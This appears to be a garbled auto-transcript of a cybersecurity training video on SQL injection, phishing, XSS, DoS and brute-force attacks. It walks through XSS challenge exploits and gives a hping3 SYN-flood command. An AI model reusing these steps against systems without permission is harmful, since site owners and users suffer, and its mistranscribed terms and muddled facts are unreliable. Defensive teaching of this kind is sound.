was an operator this shouldn’t be allowed to be utilized in the first place right so here what we are doing here is a secure way of running a SQL query in the JDBC using a parameterized statement define which user we want to find so there’s a string the email comes in connection to the database we are going to figure out how the connection is going to be passed how it is going to be created construct the SQL statement we want to run specifying the parameter right so we define how is it going to be uh created what is going to be created what can be passed to the database and what should not be passed to the database so that is one way of uh utilizing prepared statements and parameterized queries then we have object relational mapping most development uh teams prefer to use objection object relational mapping frameworks to make the translation of SQL results set into code objects more seamless so this is an example of object relational mapping uh where we map certain objects and allow that to be executed and then escaping inputs in a simple way to protect against most SQL injection attacks many languages have standard functions to achieve this right so you need to be very careful while using escape characters in your codebase when a SQL statement is constructed not all injection attacks rely on abuse of code characters so you need to know what characters are being utilized uh in the configuration that you have created in the structure that you have created in the code that you have created uh which characters are being recognized as operators you need to sanitize those operators and you need to uh basically ensure that these operators cannot be accepted as user input if they are they’re weeded out by the application and they never reach the database other methods of preventing SQL injection are uh password hashing so that passwords cannot be bypassed the passwords cannot be recovered passwords cannot be cracked uh third party authentication you use oath or uh some other service for a single sign on mechanism does uh you rely on a third party to maintain the security of authentication and uh what kind of parameters are passed for example uh using LinkedIn login or Facebook login right uh for the layman you normally go on to Facebook and you allow if you’re using a game right if you start playing a game you’re allowed to log into the game using your Facebook credentials or your Google credentials now that is not just for ease of use but the game user the developer has outsourced the authentication mechanisms to third parties such as Facebook or Google because they understand that that authentication mechanism is as safe as can be facebook and Google are wealthy organizations uh hire a lot of security experts and the development for their authentication mechanisms is topnotch small organization cannot spend that kind of money on security itself right so you use a third party authentication mechanism to ensure that these kind of attacks may not happen then web application firewalls uh having a web application firewall and configuring it properly uh for SQL injection attacks is one of the sureot method of uh mitigating or minimizing the uh threat in the first place so at this point in time you have realized that the application has some vulnerabilities for SQL injection and instead of recoding or restructuring the application uh you want to take the easier way out or the cheaper way out so what you do is you uh you install a web application firewall and you configure the web application firewall to identify malicious queries and stop them uh at the firewall level itself so they never reach the application and thus the vulnerabilities on the application don’t get executed buy better software and keep on updating the software so it’s not necessary that once you have a software you install it it’s going to be safe for life new vulnerabilities are discovered every day every hour and it may so happen what is secure today may be completely insecure tomorrow or the day after right so you need to keep on upgrading the software if there are no upgrades available and the vulnerability still exist you might want to migrate to a better software and thus uh ensure that you don’t get hacked right always update and use patches organizations keep on sending out updates and patches as and when they are released you need to install them to uh enhance your security postures and then continuously monitor SQL statements and databases use protocol monitors uh use different softwares use the firewalls to keep on monitoring what kind of queries you’re uh getting and based on those queries you want to ensure the inputs and the queries that are creating are not detrimental to the health of the software that you have jane is relaxing at home when she receives an email from a bank that asks her to update her credit card PIN in the next 24 hours as a security measure judging the severity of the message Jane follows the link provided in the email on delivering her current credit card PIN and the supposedly updated one the website became unresponsive which prompted her to try sometime later however after a couple of hours she noticed a significant purchase from a random website on that same credit card which she never authorized frantically contacting the bank Jane realized the original email was a counterfeit or a fake message with a malicious link that entailed credit card fraud this is a classic example of a fishing attack fishing attacks are a type of social engineering where a fraudulent message is sent to a target on the premise of arriving from a trusted source its basic purpose is to trick the victim into revealing sensitive information like passwords and payment information it’s based on the word fishing which works on the concept of baits if a supposed victim catches the bait the attack can go ahead which in our case makes Jane the fish and the fishing emails the bait if Jane never opened the malicious link or was cautious about the email authenticity an attack of this nature would have been relatively ineffective but how does the hacker gain access to these credentials a fishing attack starts with a fraudulent message which can be transmitted via email or chat applications even using SMS conversations to impersonate legitimate sources is known as smishing which is a specific category of fishing attacks irrespective of the manner of transmission the message targets the victim in a way that coaxes them to open a malicious link and provide critical information on the requisite website more often than not the websites are designed to look as authentic as possible once the victims submit information using the link be it a password or credit card details the data is sent to the hacker who designed the email and the fake website giving him complete control over the account whose password was just provided often carried out in campaigns where an identical fishing mail is sent to thousands of users the rate of success is relatively low but never zero between 2013 and 2015 corporate giants like Facebook and Google were tricked off of $100 million due to an extensive fishing campaign where a known common associate was impersonated by the hackers apart from credit access some of these campaigns target the victim device and install malware when clicked on the malicious links which can later function as a botnet or a target for ransomware attacks there is no single formula for there are multiple categories of fishing attacks the issue with Jane where the hacker stole her bank credentials falls under the umbrella of deceptive fishing a general email is sent out to thousands of users in this category hoping some of them fall prey to this scam spear fishing on the other hand is a bit customized version the targets are researched before being sent an email for example if you never had a Netflix subscription sending you an email that seems like the Netflix team sends it becomes pointless this is a potential drawback of deceptive fishing techniques on the other hand a simple screenshot of a Spotify playlist being shared on social media indicates a probable point of entry the hacker can send counterfeit messages to the target user while implying the source of such messages being Spotify tricking them into sharing private information since the hacker already knows the target uses Spotify the chances of victims taking the bait increase substantially for more important targets like CEOs and people with a fortune on their back the research done is tenfold which can be called a case of whaling the hackers prepare and wait for the right moment to launch their fishing attack often to steal industry secrets for rival companies or sell them off at a higher price apart from just emails farming focuses on fake websites that resemble their original counterparts as much as possible a prevalent method is to use domain names like Facebook with a single O or YouTube with no E these are mistakes that people make when typing the full URL in the browser leading them straight to a counterfeit web page which can fool them into submitting private data a few more complex methods exist to drive people onto fake websites like ARP spoofing and DNS cash poisoning but they are rarely carried out due to time and resource constraints now that we know how fishing attacks work let’s look at ways to prevent ourselves from becoming victims while the implications of a fishing attack can be extreme protecting yourself against these is relatively straightforward jane could have saved herself from credit card fraud had she checked the link in the email for authenticity and that a redirected to a secure website that runs on the HTTPS protocol even suspicious messages shouldn’t be entertained one must also refrain from entering private information on random websites or pop-up windows irrespective of how legitimate they seem it is also recommended to use secure anti-ishing browser extensions like cloudfish to sniff out malicious emails from legitimate ones the best way to prevent fishing is browsing the internet with care and being on alert for malicious attempts at all times start by learning about cross-ite scripting from a layman’s perspective cross-ite scripting also known as XSS is a type of code injection attack that occurs on the client side the attacker intends to run harmful scripts in the victim’s web browser by embedding malicious code in a genuine web page or online application the real attack takes place when the victim hits the malicious code infected web page or online

application the web page or application serves as a vehicle for the malicious script to be sent to the user’s browser forums message boards and online pages that enable comments are vulnerable vehicles that are frequently utilized for cross-cripting assaults a web page or web application is vulnerable to XSS if the output it creates contains unsanitized user input the victim’s browser must then parse this user input in VBScript ActiveX Flash and even CSS cross-side scripting attacks are conceivable they are nevertheless most ubiquitous in JavaScript owing to the fact that JavaScript is most important to most browser experiences nowadays the main purpose of this attack is to steal the other user’s identity be it via cookies session tokens and other information in most of the cases this attack is being used to steal the other person’s cookies as we know cookies help us to login automatically therefore with the stolen cookies we can login with other identities and this is one of the reasons why this attack is considered as one of the riskiest attacks it can be performed with different client side programming languages as well cross-side scripting is often compared with similar client side attacks as client side languages are mostly being used during this however an XSS attack is considered riskier because of its ability to damage even less vulnerable technologies most often this attack is performed with JavaScript and HTML javascript is a programming language that runs on web pages inside your browser the client side code adds functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms unlike serverside languages such as PHP JavaScript code runs inside your browser and cannot impact the website for other visitors it is sandboxed to your own navigator and can only perform actions within your own browser window while JavaScript is client side and does not run on the server it can be used to interact with the server by performing background requests attackers can then use these background requests to add unwanted spam content to a web page without refreshing it they can then gather analytics about the client’s browser or perform actions asynchronously the manner of attack can range in a variety of ways it can be a single link which the user must click on to initiate a JavaScript piece of code it can be used to show any piece of images that can be later used as a front end for malicious code being installed as malware with the majority of internet users unaware of how metadata works or the ways in which web requests are called the chances of victims clicking on a redirecting links is far too high cross-ite scripting can occur on the malicious script executed at the client site using a fake page or even a form that is displayed to the user on websites with displayed advertisements malicious emails can also be sent to the victim these attacks occur when the malicious user finds the vulnerable parts of the website and sends it as appropriate malicious input now that we understand the basics of cross-ite scripting let us learn more about how this kind of attack works in the first place we have the website or the web browser which is used to show content to the victim or which is the user in our case whenever the user wants to grab some content from the website the website asks the data from the server the server provides this information to the website and the web browser which ultimately reaches the victim how the hacker comes into play here it passes on certain arguments to the web browser which is can be then forwarded back to the server or to the user at hand the entire cross-ite scripting attack vector means sending and injecting malicious code or script this attack can be performed in different ways depending on the type of attack the malicious script may be reflected on the victim’s browser or stored in the database and executed every time when the user calls the appropriate function the main reason for this attack is inappropriate users input validation where the malicious input can get into the output a malicious user can enter a script which will be injected onto the website’s code then the browser is not able to know if the executed code is malicious or not therefore this malicious script is being executed on the victim’s browser or any faked form if that is being displayed for the users there are many ways to trigger an XSS attack for example the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page like hyperlinks potential consequences of cross-sight scripting attacks include capturing keystrokes of a user redirecting a user to malicious websites running web browser based exploits obtaining cookie information of a user who is logged into a website and many more in some cases cross-ite scripting attack leads to complete compromise of the victim’s account attackers can trick users into entering credentials on a fake form which can then provide all information to the attacker with the basic working of a cross-ite scripting attack out of the way let us go over the different ways hackers can leverage vulnerable web applications to gather information and eventually breach those systems the prime purpose of performing XSS attack is to steal the other person’s identity as mentioned it may be cookies session tokens etc xss may also be used to display faked pages or forms for the victim however this can be performed in several ways we have a reflected attack this attack occurs when a malicious script is not being saved on the web server but is reflected in the website results reflected XSS code is not being saved permanently in this case the malicious code is being reflected in any website result the attack code can be included in the faked URL or in the HTTP parameters it can affect the victim in different ways by displaying faked malicious page or by sending a malicious email in a reflected cross-ite scripting example the input of a search form is reflected on the page to show what the search key was an attacker may craft a URL that contains malicious code and then spread the same URL via email or social media a user who clicks on this link opens the valid web application which then runs the malicious code in the browser this script is not stored in the web application and malicious code is shown only to one user the user that opens the link executes the script and the attack is not necessarily visible on the server side or to the app owner itself the next variant is a stored cross-ite scripting attacks this occurs when a malicious script is being saved on the web server permanently this can be considered a riskier attack since it has leverage for more damage in this type of attack the malicious code or script is being saved on the server for example in the database or the website it is executed every time the users call the appropriate functionality this way stored XSS attack can affect many users also as the script is being stored on the web server it will affect the website for a longer time in order to perform stored XSS attack the malicious scripts should be sent through the vulnerable input form for example can be a command field or review field this way the appropriate script will be saved in the database and evaluated on the page load or appropriate function calling in a stored XSS example the script might have been submitted via an input field to the web server which did not perform a sufficient validation and stores the script permanently in the database the consequence of this might be that the script is now being delivered to all users visiting the web application and if for example able to gain access to the user session cookies in this attack the script is permanently stored in the web app the users visiting the app after the information retrieve the script the malicious code then exploits the flaws in the web application and the script and the attack is visible on the server side or to the app owner as well the third variant is DOM based cross-ite scripting attacks this type of attack occurs when the DOM environment is being changed but the client side code does not change when the DOM environment is being modified in the victim’s browser the client side code executes differently in order to get a better understanding of how XSS DOM attack is being performed let us analyze the following example if there is a website called textin.com we know default is a parameter therefore in order to perform XSS DOM attack we should send a script as parameters a DOM based XSS attack may be successfully executed even when the server does not embed any malicious code into the web page by using a flaw in the JavaScript executed in the browser for example if the client side JavaScript modifies the DOM tree of the web page it can be based on an input field or the get parameter without validating the input this allows the malicious code to be executed the malicious code that exploits flaws in the browser on the user side and the script and the attack is not necessarily visible on the server side or to the app owner by now it is clear that cross-ite scripting attacks are difficult to detect and even tougher to fight against there are however plenty of ways one can safeguard against such attacks let’s go through some of these preventive measures like mentioned earlier XSS attacks are sometimes difficult to detect however this can be changed if you get some external help a way to prevent excss attacks is using automated testing tools like crash test security suit or aunetic security suit still manual testing is highly timeconuming and costly and therefore not possible to be done for every iteration of your web application consequently your code shouldn’t be untested before any release using automated security you can scan your web application for cross-ite scripting and other critical vulnerabilities before every release this way you can ensure that your web application slide version is still secured whenever you alter or add a feature input fields are the most common point of entry for XSS attack script therefore you should always screen and validate any information input into data fields this is particularly important if the data will be included as HTML output this can be used to protect against reflected excss attacks validation should occur on both the client side and server side as an added precaution this helps validating the data before it’s being sent to the servers and can also protect against persistent XSS scripts this can be accomplished using JavaScript xss attacks only appear if any user input is being displayed on the web page therefore try to avoid displaying any untrusted user input if possible if you need to display user data restrict the places where the user input might appear any input displayed inside a JavaScript tag or a URL shown on the site is much more likely to be exploited than the input that appears inside a division or a span element inside the HTML body protecting against excss vulnerabilities typically requires properly escaping userprovided data that is placed on the page rather than trying to determine if the data is user provided and could be compromised we should always play it safe and escape data whether it is user provided or not unfortunately because there are many different rules for escaping you still must choose the proper type of escaping before settling on a final code encoding should be applied directly before user controllable data is written to a page because the context you’re writing into determines what kind of encoding you need to use for example values inside a JavaScript string require a different type of escaping to those in an HTML context sometimes you’ll need to apply multiple layers of encoding in the correct order for example to safely embed user input inside an event handler you need to deal with both JavaScript context and the HTML context so you need to first uni code escape the input and then HTML encoded content security policy or CSP is a computer security standard introduced to prevent cross-ite scripting clickjing and other code injection attacks resulting from the execution of malicious content in the trusted webpage context it is a candidate recommendations of the W3C working group on web application security it’s widely supported by modern web browsers and provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on their website http is an additional flag included in a set cookie HTTP response header using the HTTP only flag when generating a cookie helps mitigate the risk of clientside script accessing the protected cookie that is if the browser supports it if the HTTP only flag is included in the HTTP response header the cookie cannot be accessed through a client side script again this is if the browser supports this flag as a result even if a cross-side scripting flaw exists and a user accidentally accesses a link that exploits this flaw the browser will not reveal the cookie to a third party if a browser does not support HTTP only and a website attempts to set an HTTP cookie the HTTP only flag will be ignored browser browser thus creating a traditional script accessible cookie as a result the cookie becomes vulnerable to theft of modification by any malicious script next on our docket is a live demonstration where we solve a set of cross-ite scripting problems starting from the basic level to the topmost level six we’re going to start at level one in this web application it demonstrates a common cause of cross-side scripting where user input is directly included in the page without proper escaping if we interact with a vulnerable application window here and find a way to make it execute JavaScript of our choosing we can take actions inside the vulnerable window or directly edit its URL bar this task needs only basic knowledge let’s see why the most primitive injections work here right away let’s do a simple query and inspect the resulting HTML page i’m going to use this phrase with a single quote as a special character we can now inspect the HTML page we can see here in this line the special character single quote appears in the result over here the provided query text is placed directly in a B tag as in a body element we need to perform a reflected XSS into the web application because they are non-persistent XSS attacks and the payload should be included in the URL to perform successful exploitation we can use any payload but we’re going to use the simple one to perform an alert in this web application it’s simple and can be shown easily just going to write the script over here and we’re going to press search as you can see we have successfully launched our first cross-sight scripting attack we can see an alert box pop up with the necessary message and a similar process can be used to steal browser cookies and passwords albeit with different commands now we have the option to move to level two in this web application it shows that how easily XSS bugs can be introduced in complex chat applications chat app conversations are stored in a database and retrieved when a user wants to see the conversation therefore if a malicious user injects some JavaScript code all visitors will be infected this kind of cross-ite scripting attack is more powerful and it is more riskier than reflected cross-ite scripting attacks and that’s why is known as stored XSS i posted my query with a special character of a single quote and this is what I get whatever I typed in simply appeared on the page right after I click on share status let’s see the source you can see here the text I posted seems directly put inside a block code tag so even a simple script tag we used in level one should work here but it will not let us examine the code to understand why we’re going to toggle the code of A here and check the index.html file important part is line 32 the generated HTML fragment which is the HTML variable in the code is added to the mail HTML using the inner HTML method so when the browser parsing this HTML fragment it will not execute any script tag defined within that HTML fragment html parser will not execute a script tag when it parses HTMLs via this method this is why the script tag like we used in level one is not going to work here our solution is to use events events will execute the defined JavaScript we’re going to use an image over here and when we press on share status in the above injection we are loading an image that doesn’t exist which causes to trigger an on error event in on error event the it will execute our alert method with that we are able to beat level two and we can now move up to the next level in our challenge as you can see clicking on any tab causes the tab number to be displayed in the URL fragment this hints that the value after the hashtag controls the behavior of the page that is it is an input variable to confirm let’s analyze the code as you can see in line 43 inside the event handling the value provided after the hash in the URL is directly passed onto the true tab method no input validation is being performed the value passed to the choose tab method is directly injected into the img tag in line 17 this is an unsafe assignment and it is the vulnerable part of the code now all we have to do now is to craft a payload that would adjust the img tag to execute our JavaScript remember the script tag from level one would not work here since the variable HTML is used to add the DOM dynamically hence the events are aes here once again I will choose to use the existing img tag and change the source to something that doesn’t exist hence forcing it to fall in to execute an on error even which I will pass the URL once we visit that URL we can see that our Java pop-up has opened up here with the same message of XSS level 3 has been completed with this we can now move on to level four which is going to present a different kind of attack in this web application there is a timer on the page that means whatever numbers we put in the box a countdown starts and then when it finishes the application alerts that the countdown is finished and you can see the timer is a pop-up appearing over here and this resets the timer again now it is obvious that the value entered in the text box is transferred to the server over the timer parameter in the URL let us examine the code to see how the timer parameter is being handled we’re going to visit timer.html over here and we’re going to check over here in line 21 the start timer method is being called in the onload event however the timer parameter is being directly passed to the start timer method we need to perform a pop-up alert in the web application which escapes the content of the function start timer without baking the JavaScript code the parameter value is directly added to the start timer method without any filtering what we can try to do here is to inject an alert function to be executed inside the onload event along with the start timer method we’re going to remove this argument and put our script over here now when we press on create timer and we have a pop-up with the excss level four completed we can now move on to level five in this web application the application excss is different because this challenge description says cross-ite scripting isn’t just about correctly escaping data sometimes attackers can do bad things even without injecting new elements into the DOM it’s kind of open redirect cuz the attack payload is executed as a result of modifying the DOM environment in the victim’s browser this environment is used by the original client side script so that the client side code runs in an unexpected manner the vulnerability can be easily detected if the next link in the signup page is inspected the href attribute value of next link is confirm which is exactly the value of the next URL query parameter as you can see over here this means using the next query parameter can be used to inject a JavaScript code to the href attribute of the next link the following is the best way to do it as soon as the user clicks on the link the script will be triggered we’re going to press anything random and now that we click next we can see the XSS level five that we had provided in the URL as a parameter to the next variable since the value of next provided appears in a pop-up we can consider the attacker success and move on to the final level six in this web application it shows some of the external JavaScript is retrieved if you analyze the URL you can see that the script is loaded already the vulnerability lies within how the code handles the value after the hashtag if you check on line 45 the value right after the hashtag is taken as the gadget name and then in line 48 the value is directly passed on to the include gadget method and in the include gadget method that we can see over here you can see in line 18 a script tag is created and the URL gadget name parameter value is directly used as the source attribute of the script tag in line 28 this means we can completely control the source attribute of the script tag that is being created that is with this vulnerability we can inject our own JavaScript file into the code we can inject a URL of our own hosted JavaScript into the web application’s URL after the hashtag and the URL should not be using HTTPS but anything like that to bypass the regular expression for security checking going to remove the pre-tored URL and we’re going to load our own JavaScript file finally we have reached the end of our challenge completed six different varieties of crosscripting attacks and use different solutions for all of the six questions with work from home being the norm in today’s era people spend considerable amount of time on the internet often without specific measures to ensure a secure session apart from individuals organizations worldwide that host data and conduct business over the internet are always at the risk of a DDoS attack these DDoS attacks are getting more extreme with hackers getting easy access to the graph three of the six strongest DD dos attacks were launched in 2021 with the most extreme attack occurring just last year in 2020 lately cyber criminals have been actively seeking out new services and protocols for amplifying these DDoS attacks active involvement with hacked machines and botnets allow further penetration into the consumer space allowing much more elaborate attack campaigns apart from general users multinational corporations have also had their fair share of problems github a platform for software developers was the target of a DOS attack in 2018 widely suspected to be conducted by Chinese authorities this attack went on for about 20 minutes after which the systems were brought into a stable condition it was the strongest DOS attack to date at the time and made a lot of companies reconsider the security practices to combat such attacks even after years of experimentation TDOS attacks are still at large and can affect anyone in the consumer and corporate space hey everyone this is Babub from SimplyLearn and welcome to this video on what is a DOS attack let’s learn more about what is a DOS attack a distributed denial of service attack or DOS is when an attacker or attackers attempt to make it impossible for a service to be delivered this can be achieved by thwarting access to virtually anything servers devices services networks applications and even specific transactions within applications in a DOSS attack it’s one system that is sending the malicious data or requests a DOS attack comes from multiple systems generally these attacks work by drowning a system with requests for data this could be sending a web server so many requests to serve a page that it crashes under the demand or it could be a database being hit with a high volume of queries the result is available internet bandwidth CPU and RAM capacity become overwhelmed the impact could range from a minor annoyance from disrupted services to experiencing entire websites applications or even entire businesses taking offline more often than not these attacks are launched using machines in a botnet a botnet is a network of devices that can be triggered to send requests from a remote source often known as the command and control center the bots in the network attack a particular target thereby hiding the original perpetrator of the DOS campaign but how do these devices come under a botnet and what are the requests being made to the web servers let’s learn more about these and how do attack work a DOS attack is a two-phase process in the first phase a hacker creates a botnet of devices simply put a vast network of computers are hacked via malware ransomware or just simple social engineering these devices become a part of the botnet which can be triggered any time to start bombarding a system or a server on the instruction of the hacker that created the botnet the devices in these networks are called bots or zombies in the second phase a particular target is selected for the attack when the hacker finds the right time to attack all the zombies in the botnet network send these requests to the target thereby taking up all the servers available bandwidth these can be simple ping requests or complex attacks like SYN flooding and UDP flooding the aim is to overwhelm them with more traffic than the server or the network can accommodate the goal is to render the website or service inoperable there is a lot of wiggle room when it comes to the type of DOS attack a hacker can go with depending on the targets vulnerability we can choose one of the three broad categories of DOS attacks volume- based attacks use massive amounts of bogus traffic to overwhelm a resource it can be a website or a server they include ICMP UDAP and spoofed packet flood attacks the size of volume based attack is measured in bits per second these attacks focus on clogging all the available bandwidth for the server thereby cutting the supply short several requests are sent to the server all of which warrant a reply thereby not allowing the target to cater to the general legitimate users next we have the protocol level attacks these attacks are meant to consume essential resources of the target server they exhaust the load balances and firewalls which are meant to protect the system against the DOS attacks these protocol attacks include SY and floods and Smurf DDoS among others and the size is measured in packets per second for example in an SSL handshake server replies to the hello message sent by the hacker which will be the client in this case but since the IP is spoofed and leads nowhere the server gets stuck in an endless loop of sending the acknowledgement without any end in sight finally we have the application level attacks application layer attacks are conducted by flooding applications with maliciously crafted requests the size of application layer attacks is measured in requests per second these are relatively sophisticated attacks that target the application and operating system level vulnerabilities they prevent the specific applications from delivering necessary information to users and hog the network bandwidth up to the point of a system crash examples of such an attack are HTTP flooding and BGP hijacking a single device can request data from a server using HTTP post or get without any issues however when the requisite botnet is instructed to bombard the server with thousands of requests the database bandwidth gets jammed and it eventually becomes unresponsive and unusable but what about the reasons for such an attack there are multiple lines of thought as to why a hacker decides to launch a DOS attack on unsuspecting targets let’s take a look at a few of them the first option is to gain a competitive advantage many DOS attacks are conducted by hacking communities against rival groups some organizations hire such communities to stagger their rivals resources at a network level to gain an advantage in the playing field since being a victim of a DOS attack indicates a lack of security the reputation of such a company takes a significant hit allowing the rivals to cover up some ground secondly some hackers launch these DOS attacks to hold multinational corporations at ransom the resources are jammed and the only way to clear the way is if the target company agrees to pay a designated amount of money to the hackers even a few minutes of inactivity is detrimental to a company’s reputation in the global market and it can cause a spiral effect both in terms of market value and product security index most of the time a compromise is reached and the resources are freed after a while dos attacks have also found use in the political segment certain activists tend to use DOS attacks to voice their opinion spreading the word online is much faster than any local rally or forum primarily political these attacks also focus on online communities ethical dilemmas or even protests against corporations let’s take a look at a few ways that companies and individuals can protect themselves against DOS attacks the company can employ load balances and firewalls to help protect the data from such attacks load balances reroute the traffic from one server to another in a DOS attack this reduces the single point of failure and adds resiliency to the server data a firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate it checks for multiple attacks from a single IP and occasional slowdowns to detect a DOS attack in action early detection of a DOS attack goes a long way in recovering the data lost in such an event once you’ve detected the attack you will have to find a way to respond for example you will have to work on dropping the malicious DOS traffic before it reaches your server so that it doesn’t throttle and exhaust your bandwidth here’s where you will filter the traffic so that only legitimate traffic reaches the server by intelligent routing you can break the remaining traffic into manageable chunks that can be handled by your cluster resources the most important stage in DOS mitigation is where you will look for patterns of DDoS attacks and use those to analyze and strengthen your mitigation techniques for example blocking an IP that’s repeatedly found to be offending is a first step cloud providers like Amazon Web Services and Microsoft Azure who offer high levels of cyber security including firewalls and threat monitoring software can help protect your assets and network from DDoS criminals the cloud also has greater bandwidth than most private networks so it is likely to fail if under the pressure of increased TOS attacks additionally reputable cloud providers offer network redundancy duplicating copies of your data systems and equipment so that if your service becomes corrupted or unavailable due to a DOS attack you can switch to a secure access on backed up versions without missing a beat one can also increase the amount of bandwidth available to a host server being targeted since DOS attacks fundamentally operate on the principle of overwhelming systems with heavy traffic simply provisioning extra bandwidth to handle unexpected traffic spikes can provide a measure of protection this solution can prove expensive as a lot of that bandwidth is going to go unused most of the time a content delivery network or a CDN distributes your content and boosts performance by minimizing the distance between your resources and end users it stores the cached version of your content in multiple locations and this eventually mitigates DOS attacks by avoiding a single point of failure when the attacker is trying to focus on a single target popular CDNs include Accom My CDN Cloudflare AWS CloudFront etc let’s start with a demo regarding the effects of DOS attacks on a system for a demo we have a single device that will attack a target making it a DOS attack of sorts once a botnet is ready multiple devices can do the same and eventually emulate a DOS attack to do so we will use the virtualization software called VMware with an instance of Parrot Security operating system running for a target machine we will be running another VMware instance of a standard Linux distribution known as Linux light in a target device we can use Wireshark to determine when the attack begins and see the effects of the attack accordingly this is Linux light which is our target machine and this is parrot security which is used by the hacker when trying to launch a DOS attack this is just one of the dros that can be used to launch the attack we must first find the IP address of our target so to find the IP address we open the terminal we use the command if config and here we can find the IP address now remember we’re launching this attack in VMware now the both the instances of parrot security and Linux light are being run on my local network so the address that you can see here is 192.168.72.129 which is a private address this IP cannot be accessed from outside the network basically anyone who is not connected to my Wi-Fi when launching attacks with public servers or public addresses it will have a public IP address that does not belong to the 1921 168 subnet once we have the IP address we can use a tool called Hping 3 hping 3 is an open-source packet generator and analyzer for the TCP IP protocol to check what are the effects of an attack we will be using Wireshark wireshark is a network traffic analyzer we can see whatever traffic that is passing through the Linux light distro is being displayed over here with the IP address the source IP and the destination IP as to where the request is being transferred to once we have the DOSS attack launched you can see the results coming over here from the source IP which will be par security now to launch the HP3 command we need to give pseudo access to the console which is the root access now we have the root access for the console the hping 3 command will have a few arguments to go with it which are as you can see on the screen minus s and a flood a hyphen v hyphen p8 and the IP address of the target which is 192.16872.129 in this command we have a few arguments that such as the minus s which specifies SYN packets like in an SSL handshake we have the SYN request that the client sends to the server to initiate a connection the hyphen flood aims to ignore the replies that the server will send back to the client in response to the SYN packets here the parrot security OS is the client and Linux slide being the server minus V stands for verbosity as in where we will see some output when the requests are being sent the hyphen P80 stands for port 80 which we can replace the port number if we want to attack a different port and finally we have the IP address of our target as of right now if we check wireshark it is relatively clear and there is no indication of a DOS attack incoming now once we launch the attack over here we can see the uh requests coming in from this IP which is 192.168 72.128 till now even the network is responsive and so is Linux light the requests keep on coming and we can see the HTTP flooding has started in flood mode after a few seconds of this attack continuing the server will start shutting down now remember Linux light is a distro that can focus on and that serves as a backend now remember Linux light is a distro and such Linux distros are served as backend to many servers across the world for example a few seconds have passed from the attack now the system has become completely irresponsive this has happened due to the huge number of requests that came from pirate security you can see whatever I press nothing is responded even the wireshark has stopped capturing new requests because the CPU usage right now is completely 100% and at this point of time anyone who is trying to request some information from this Linux distro or where this Linux distro is being used as a backend for a server or a database cannot access anything else the system has completely stopped responding and any request any legitimate request from legitimate users will be dropped once we stop the attack over here it takes a bit of time to settle down now remember it’s still out of control but eventually the traffic dies down and the system regains its strength it is relatively easy to gauge right now the effect of a DOSS attack now remember this Linux light is just a VM instance actual website servers and web databases they have much more bandwidth and are very secure and it is tough to break into that is why we cannot use a single machine to break into them that is where a DOS attack comes into play what we did right now is a DOS attack as in a single system is being used to penetrate a target server using a single request now when a DOS attack multiple systems such as multiple pirate security instances or multiple zombies or bots in a botnet network can attack a target server to completely shut down the machine and drop any legitimate requests thereby rendering the service and the target completely unusable and inoperable as a final note we would like to remind that this is for educational purposes only and we do not endorse any attacks on any domains only test this on servers and networks that you have permission to test on cyber security has become one of the most rigid industries in the last decade while simultaneously being the most challenged with every aspect of corporate culture going online and embracing cloud computing there is a plethora of critical data circulating through the internet all worth billions of dollars to the right person increasing benefits require more complex attacks and one of these attacks is a brute force attack a brute force or known as brute force cracking is the cyber attack equivalent of trying every key on your key ring and eventually finding the right one brute force attacks are simple and reliable there is no prior knowledge needed about the victim to start an attack most of the systems falling prey to brute force attacks are actually well secured attackers let a computer do the work that is trying different combinations of usernames and passwords until they find a one that works due to this repeated trial and error format the strength of password matters a great deal although with enough time and resources brute force will break a system since they run multiple combinations until they find the right passcode hey everyone this is Beub from Simply Learn and welcome to this video on what is a brute force attack let’s begin with learning about brute force attacks in detail a brute force attack also known as an exhaustive search is a cryptographic hack that relies on guessing possible combinations of targeted password until the current password is discovered it can be used to break into online accounts encrypted documents or even network peripheral devices the longer the password the more combinations that will need to be tested a brute force attack can be time-conuming and difficult to perform if methods such as data offiscation are used and at times downright impossible however if the password is weak it could merely take seconds with hardly any effort dictionary attacks are an alternative to brute force attacks where the attacker already has a list of usernames and passwords that need to be tested against the target it doesn’t need to create any other combinations on its own dictionary attacks are much more reliable than brute force in a real world context but the usefulness depends entirely on the strength of passwords being used by the general population there is a three-step process when it comes to brute forcing a system let’s learn about each of them in detail in step one we have to settle on a tool that we are going to use for brute forcing there are some popular names on the market like Hashcat Hydra and John the Ripper while each of them has its own strength and weaknesses each of them perform well with the right configuration all of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cyber security analysts like Kali Linux and Parrot Security after deciding what tool to use we can start generating combinations of alpha numeric variables whose only limitation is the number of characters for example while using Hydra a single six-digit password will create 900,000 passwords with only digits involved add alphabets and symbols to that sample space and that numbers grows exponentially the popular tools allow customizing this process let’s say the hacker is aware of the password being a specific 8digit word containing only letters and symbols this will substantially increase the chances of being able to guess the right password since we remove the time taken to generate the longer ones we omit the need for including digits in such combinations these small tweaks go a long way in organizing an efficient brute force attack since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time in the final step we run these combinations against the file or service that is being broken we can try and break into a specific encrypted document a social media account or even devices at home that connect to the internet let’s say there is a Wi-Fi router the generated passwords are then fed into the connection one after the other it is a long and arduous process but the work is left to the computer other than someone manually clicking and checking each of these passcodes any password that doesn’t unlock the router is discarded and the brute force tool simply moves on to the next one this keeps going on until we find the right combination which unlocks the router sometimes reaching the success stage takes days and weeks which makes it cumbersome for people with low computing power at their disposal however the ability to crack any system in the world purely due to bad password habits is very appealing and the general public tends to stick with simple and easy to use passwords now that we have a fair idea about how brute force works let’s see if we can answer this question we learned about how complex passwords are tougher to crack by brute force among the ones listed on the screens which one do you believe will take the longest to be broken when using brute force tools leave your answers in the comment section and we will get back to you with the correct option next week let’s move on to the harmful effects of getting a system compromised due to brute force attacks a hacked laptop or mobile can have social media accounts logged in giving the hackers free access to the victim’s connections it has been reported on multiple occasions where compromised Facebook accounts are sending malicious links and attachments to people on their friends list one of the significant reasons for hacking malware infusion is best done when spread from multiple devices similar to distributing spam this reduces the chance of circling back the source to a single device which belongs to the hacker once brute forced a system can spread malware via email attachments sharing links file upload via FTP etc personal information such as credit card data usage habits private images and videos are all stored in our systems be it in plain format or root folders a compromised laptop means easy access to these information that can be further used to impersonate the victim regarding bank verification among other things once a system is hacked it can also be used as a mail server that distributes spam across lists of victims since the hacked machines all have different IP addresses and MAC addresses it becomes challenging to trace the spam back to the original hacker with so many harmful implications arising from a brute force attack it’s imperative that the general public must be protected against such let’s learn about some of the ways we can prevent ourselves from becoming a victim 